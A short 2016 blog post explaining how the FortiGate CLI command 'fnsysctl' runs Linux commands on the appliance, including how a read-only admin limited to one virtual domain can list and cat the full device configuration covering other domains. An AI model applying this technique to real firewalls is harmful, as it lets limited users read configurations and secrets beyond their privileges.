Wednesday, 11 May 2016

FortiGate CLI HACKING


It's a short information on FortiGate CLI and get to linux shell (sort of that).

Basicly as we know most of networking vendors use Linux OS as main OS for there network devices,but for security reasons (they don't like to support old stuff) they hide the iner Linux shell from normal users (i don't like it:). In some device it is done good and nice and in some no so nice, some leave it only for debuging purpuse (Like in Forti). In this class we have old good Fortigare device, telling the truth i like this devices looking from the price point.

Ok back to main toppic, how to get to Linux from Fotigate CLI. We have two possible solliutions:

1. The first and more easy solliution is to use magic command fnsysctl + <linux CMD>

Forti # fnsysctl ls
bin               data              data2             dev              
etc               fortidev-x86_64   fortidev4-x86_64  ipc_quar         
ipc_quar_backup   lib               lib64             migadmin         
proc              sbin              smo               tmp              
usr               var      


It's easy, the most intersting thing is that we can get to higher privilgate level with this commad. For example if I am an read only user <test> dedicated for one vdom ( a virtual system, some kind of if)  and with only read privilage :

# the profile for test - Read Only
config system accprofile
    edit "test"
        set admingrp read
        set authgrp read
        set comments "read"
        set endpoint-control-grp read
        set fwgrp read
        set loggrp read
        set mntgrp read
        set netgrp read
        set routegrp read
        set sysgrp read
        set updategrp read
        set utmgrp read
        set vpngrp read
        set wanoptgrp read
        set wifi read
    next
end


# the user dedicated to only test vdom
config system admin
    edit "test"
        set accprofile "test"
        set vdom "test"
        set password ENC ***********

    next
end













So we can login in with our test user and see what can we do:

Forti login: test
Password: ****
Welcome !

Forti $ fnsysctl ls
bin               data              data2             dev              
etc               fortidev-x86_64   fortidev4-x86_64  ipc_quar         
ipc_quar_backup   lib               lib64             migadmin         
proc              sbin              smo               tmp              
usr               var        

Not so speacial, but we also can list and read full config of FortiGate and see outher VDOM settings :

# the location of configs in Fortigate Flash:
Forti $ fnsysctl ls  /data2/config
cfg0000000036  cfg0000000037  cfg0000000038  cfg0000000039  cfg0000000040 
cfg0000000041  cfg0000000042  cfg0000000043  cfg0000000044  cfg0000000045 
cfg0000000046  cfg0000000047  cfg0000000048  cfg0000000049  cfg0000000050


And afcouse we can read the woth cat:

Forti $ fnsysctl cat  /data2/config/cfg0000000075                                                                                                           
#config-version=FG100D-5.00-FW-build271-140409:opmode=0:vdom=1:user=admin
#conf_file_ver=23568740905703635265
#buildno=4429
#global_vdom=1

config vdom
edit root
next
edit ZONE1
next
edit test
next
edit opaopa
next
edit ZONE2
next
edit BRIDGE2

.....



With out the basic commands we have also ping,cat, kill,killall,ifconfig, etc, not all commands work but it's enouth for basic debuging.

The interesting thing is that the WEB GUI interface is running on django framework (python based):


fnsysctl ls /usr/lib/proj/                                                                                                                          
__init__.py   __init__.pyc  config.py     config.pyc    firewall     
fortiswitch   ftnt          logs          manage.py     pubredir     
registration  reports       router        settings.py   settings.pyc 
sprite        system        urls.py       user          utils        
utm           vpn           wanopt        wifi